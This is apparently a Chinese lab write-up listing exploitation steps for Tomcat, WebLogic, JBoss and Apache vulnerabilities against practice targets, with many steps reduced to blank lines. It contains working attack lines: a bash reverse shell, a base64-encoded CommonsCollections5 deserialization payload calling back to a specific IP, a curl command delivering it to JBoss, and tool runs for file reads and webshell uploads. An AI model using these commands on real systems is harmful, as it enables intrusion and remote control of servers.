Bootstrap

常见中间件漏洞

一:tomcat

1.1 CVE-2017-12615

1.搭建靶场

2.打开网站,进行抓包

 

3.桌面创建一个jsp文件 可以用哥斯拉工具生成一个jsp代码

 

4.抓包后修改提交方式,并将jsp代码复制到抓包后发送 

5.去访问jsp文件成功上传去哥斯拉工具测试连接

 

 

 

 

1.2 后台弱口令部署war包

1.重新搭建环境

 

2.上传war文件

 

3.访问成功,使用工具连接

 

 

 

1.3 CVE-2020-1938

1.搭建环境

2.python cve-2020-1938.py -p 8009 -f /WEB-INF/web.xml 124.221.58.83

使用命令进行测试

m 

二.WebLogic

 2.1后台弱口令GetShell

1.搭建环境

2. 访问靶场使用用户名密码进行登录

3.点击部署 进行安装 

 

4.上传.war文件 一直下一步

 

 

6.可以看到上传的文件 

 

7.进行访问,访问成功 

 

 

 

2.2 CVE-2017-3506 

1.搭建环境进行访问

 

2.进行抓包,修改请求方式 

 

3.去监听反弹shell成功 

 

2.3 CVE-2019-2725 

1.搭建环境,进行访问

 

2.在云服务器上传一个1.txt文件内容为jsp代码 

 

3.修改请求方法发送 

 

4.访问文件位置

 

 

2.4 CVE-2018-2628

1.搭建环境进行访问

 

2.使用工具测试

 

2.5 CVE-2018-2894

1.搭建环境后,获取登录密码

 

2. 登录后结构->base-domain->高级 ->启动Web服务测试页

3.点击启用web服务测试页

 

 

4.修改工作目录 

 

5.添加上传木马 ,记住ID

 

 

 

 

2.6 CVE-2020-14882

1.搭建环境访问

 

2.

 

 

三.JBoss

3.1 CVE-2015-7501

1.搭建环境进行访问

 

使用命令进行反弹shell 

bash -i >& /dev/tcp/IP/6666 0>&1
ComonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}">exp.ser
curl http://IP:8080/invoker/JMXInvokerServlet --data-binary @exp.ser 

 

3.2 CVE-2017-7504

1.搭建环境进行访问  访问地址:/jbossmq-httpil/HTTPServerILServlet

 

 

2.python3 jexboss.py -u http://IP:8080   反弹shell

 

3.3 CVE-2017-12149

1.搭建环境 访问

 

2.访问地址:/invoker/readonly

3.使用工具进行测试,成功上传webshell即可

3.4 Administration Console弱口令

1.搭建环境访问

2. 点击Web application

3.上传.war文件

 

 

4.上传成功后 哥斯拉连接

 

3.5 低版本JMX Console未授权

1.搭建环境进行访问

 

2点击进去

.

 

 

3.上传war,进行反弹shell

 

 

 

3.6 高版本JMX Console未授权

1.搭建环境

 

2.搭建远程部署 , 部署远程war包地址

 

 

 

四、Apache
4.4 CVE-2021-41773

搭建环境后进行

 

 

 

 

 

;